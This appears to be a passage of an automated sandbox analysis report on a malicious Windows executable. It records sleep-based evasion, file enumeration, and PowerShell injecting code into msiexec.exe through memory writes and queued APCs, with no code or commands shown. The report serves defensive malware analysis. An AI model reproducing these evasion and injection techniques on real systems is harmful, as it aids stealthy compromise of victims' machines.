      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -597235s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -597110s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596985s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596860s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596735s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596610s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596485s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596360s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596235s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596116s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -596000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -595891s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -595781s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -595672s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -595563s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -595438s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -595313s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -595188s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -595078s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -594969s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -594844s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -594735s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -594610s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -594485s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -594360s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -594235s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -594110s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599297Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599187Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599078Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598969Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596116Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595563Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595438Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595313Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595188Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594969Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594844Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
      Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\^q
      Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\^q
      Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3037606643.00000000095F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\^q
      Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeAPI call chain: ExitProcess graph end nodegraph_0-2865
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeAPI call chain: ExitProcess graph end nodegraph_0-3044
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4480000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
